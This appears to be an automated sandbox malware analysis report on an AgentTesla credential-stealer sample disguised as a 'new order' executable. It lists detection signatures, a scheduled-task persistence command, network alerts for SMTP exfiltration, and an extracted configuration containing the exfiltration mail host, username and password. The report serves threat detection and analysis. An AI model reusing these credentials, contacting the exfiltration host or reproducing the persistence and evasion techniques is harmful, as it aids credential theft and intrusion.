
Windows Analysis Report new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe

Overview

General Information

Sample Name:new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
Analysis ID:532730
MD5:66cbe976594f666d5440264a4084b21f
SHA1:944c8819e41ad59333527141a7fd5180253969e1
SHA256:460eb4667362671be2be1e94afe56e73331c3a3cd58b028e49ec135fec8888a9
Tags:agentteslaexe

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Creates processes with suspicious names
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "marketing@kyowasecurity.com.sg", "Password": "avKw1$991", "Host": "mail.kyowasecurity.com.sg"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
(14 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.3922928.4.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(16 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Suspicius Add Task From User AppData Temp
Source: Process started
Author: frack113
Data:
  Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
  CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: "C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe"
  ParentImage: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
  ParentProcessId: 4252
  ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
  ProcessId: 2964

                      Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "marketing@kyowasecurity.com.sg", "Password": "avKw1$991", "Host": "mail.kyowasecurity.com.sg"}

Multi AV Scanner detection for submitted file
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | ReversingLabs: Detection: 41%

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\aUkURZiJ.exe | ReversingLabs: Detection: 41%

Machine Learning detection for sample
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Joe Sandbox ML: detected

Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\aUkURZiJ.exe | Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file
Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8

Static PE information
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49831 -> 113.197.35.43:587

Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: USONYX-AS-APUSONYXPTELTDSG USONYX-AS-APUSONYXPTELTDSG

Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.5:49831 -> 113.197.35.43:587
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248682275.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248549588.000000000569A000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248499503.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comD
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de.T
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deF
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.demM
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpString found in binary or memory: https://gaOQV1SxHxPSyzn.com
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: mail.kyowasecurity.com.sg

                      System Summary:

                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b9182023Bu002d9602u002d4B7Eu002d88F7u002d3D12A60DF8AAu007d/u00323823707u002d2712u002d4FEEu002d9E00u002dE6693C4B0FA0.csLarge array initialization: .cctor: array initializer size 11950
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_025598E80_2_025598E8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_025597900_2_02559790
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07083F400_2_07083F40
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07082D000_2_07082D00
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070855700_2_07085570
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07088C180_2_07088C18
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708D4580_2_0708D458
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070864A00_2_070864A0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07084B800_2_07084B80
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708D9280_2_0708D928
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070800400_2_07080040
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07087F400_2_07087F40
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07087F500_2_07087F50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070897B10_2_070897B1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070897D80_2_070897D8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708DE500_2_0708DE50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07083E9B0_2_07083E9B
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07083EF10_2_07083EF1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070855600_2_07085560
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708C5B00_2_0708C5B0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070885C80_2_070885C8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070885D80_2_070885D8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07088C080_2_07088C08
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070833300_2_07083330
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070833400_2_07083340
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708CB680_2_0708CB68
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07084B700_2_07084B70
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070863A00_2_070863A0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070873A10_2_070873A1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070873B00_2_070873B0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070863FB0_2_070863FB
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07088A400_2_07088A40
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070882580_2_07088258
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_07088A500_2_07088A50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070882680_2_07088268
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0708F1180_2_0708F118
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070888000_2_07088800
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_070888100_2_07088810
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF100400_2_0CF10040
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF1210A0_2_0CF1210A
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF144800_2_0CF14480
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF100060_2_0CF10006
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0CF122AA0_2_0CF122AA
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_01122D505_2_01122D50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_0112DFD85_2_0112DFD8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_01121FF05_2_01121FF0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011226185_2_01122618
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_01129DB85_2_01129DB8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011EC5105_2_011EC510
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E55585_2_011E5558
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E19705_2_011E1970
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E00405_2_011E0040
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E78F85_2_011E78F8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E40E85_2_011E40E8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E00065_2_011E0006
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E4E505_2_011E4E50
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011E82F85_2_011E82F8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E48005_2_013E4800
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E3D2C5_2_013E3D2C
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E3EB85_2_013E3EB8
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E47705_2_013E4770
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E47505_2_013E4750
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E47F35_2_013E47F3
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013E54F05_2_013E54F0
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_013ED8005_2_013ED800
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameuhljaIlIyVxZXxXUzeXkqULlxd.exe4 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVHbIB.exe8 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameuhljaIlIyVxZXxXUzeXkqULlxd.exe4 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000000.243922147.000000000030C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVHbIB.exe8 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
